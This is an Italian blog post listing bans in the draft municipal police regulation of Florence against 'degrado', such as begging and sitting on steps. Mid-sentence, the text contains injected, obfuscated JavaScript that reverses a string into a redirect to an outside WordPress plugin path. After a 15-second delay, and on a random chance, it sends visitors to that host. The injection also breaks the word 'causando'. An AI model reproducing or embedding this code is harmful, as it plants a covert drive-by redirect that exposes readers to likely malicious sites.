Firenze, non si può fare

image_pdfimage_print

Vietato sedersi sui gradini. Vietato giocare a pallone. Vietato far bere il cane alla fontana. Vietato legare la bici ai pali. Vietato volantinare entro la cerchia dei viali. Vietato mendicare caus (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando disturbo. Vietato abitare in baracche. Sono alcuni dei tanti divieti contenuti nella bozza del nuovo Regolamento di Polizia Municipale di Firenze, 45 articoli per combattere il ‘degrado’, con un’attenzione particolare verso abusivismo, bivacco e mendicanti.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *